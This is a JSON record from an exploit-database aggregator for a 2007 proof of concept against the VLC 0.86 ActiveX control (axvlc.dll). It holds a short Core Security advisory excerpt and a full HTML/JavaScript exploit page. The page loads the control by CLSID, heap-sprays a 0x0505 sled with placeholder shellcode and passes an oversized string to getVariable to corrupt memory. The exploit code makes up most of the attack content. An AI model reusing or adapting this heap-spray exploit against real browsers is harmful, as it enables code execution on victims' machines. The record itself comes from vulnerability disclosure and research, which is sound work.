{"id": "1337DAY-ID-6472", "lastseen": "2018-04-09T01:49:05", "viewCount": 5, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-09T01:49:05", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-09T01:49:05", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/6472", "description": "Exploit for unknown platform in category dos / poc", "title": "VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC", "cvelist": [], "sourceData": "==============================================================\r\nVLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC\r\n==============================================================\r\n\r\n\r\n\r\n\r\n<!--\r\n Core Security Technologiess - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs\r\n\r\n VLC Activex Bad Pointer Initialization Vulnerability\r\n\r\n*Advisory Information*\r\nTitle: VLC Activex Bad Pointer Initialization Vulnerability\r\nAdvisory ID: CORE-2007-1004\r\nAdvisory URL: http://www.coresecurity.com/?action=item&id=2035\r\nDate published: 2007-12-04\r\nDate of last update: 2007-12-03\r\nVendors contacted: VLC\r\nRelease mode: Coordinated Release\r\n\r\n*Vulnerability Description*\r\nVLC player is a popular multimedia player for various audio and video\r\nformats, and various streaming protocols.\r\n\r\nA vulnerability has been found in the ActiveX control DLL (axvlc.dll)\r\nused by VLC player. This library contains three methods whose parameters\r\nare not correctly checked, and may produce a bad initialized pointer. By\r\nproviding these functions specially crafted parameters, an attacker can\r\noverwrite memory zones and execute arbitrary code.\r\n\r\n*Vulnerable packages*\r\nVLC media player version 0.86, 0.86a, 0.86b y 0.86c.\r\n-->\r\n\r\n<html>\r\n<head>\r\n<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8'\r\nid='target' ></object>\r\n</head>\r\n<body>\r\n <script>\r\n var mm = null;\r\n\r\n if( target != null )\r\n {\r\n var param1 = unescape(\"%u0505%u0505\");\r\n var salame = \"defaultV\";\r\n var salame2 = 1;\r\n var salame3 = 0;\r\n\r\n ag = unescape(\"%uCCCC%uCCCC\");\r\n sh =\r\nunescape(\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%\");\r\n sz = sh.length * 2;\r\n npsz = 0x400000 - (sz + 0x38);\r\n nps = unescape(\"%u0505%u0505\");\r\n\r\n while(nps.length * 2 < npsz) nps += nps;\r\n ihbc = (0x0E000000 - 0x400000) / 0x400000;\r\n mm = new Array();\r\n\r\n for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;\r\n\r\n for(var i=0;i<2000;i++)\r\n param1 = param1 + unescape(\"%u0505%u0505\");\r\n\t\t\t\t\t\r\n target.getVariable (param1);\r\n }\r\n </script>\r\n</body>\r\n</html>\r\n\r\n\r\n\n# 0day.today [2018-04-09] #", "published": "2007-12-04T00:00:00", "references": [], "reporter": "Ricardo Narvaja", "modified": "2007-12-04T00:00:00", "href": "https://0day.today/exploit/description/6472"}

{}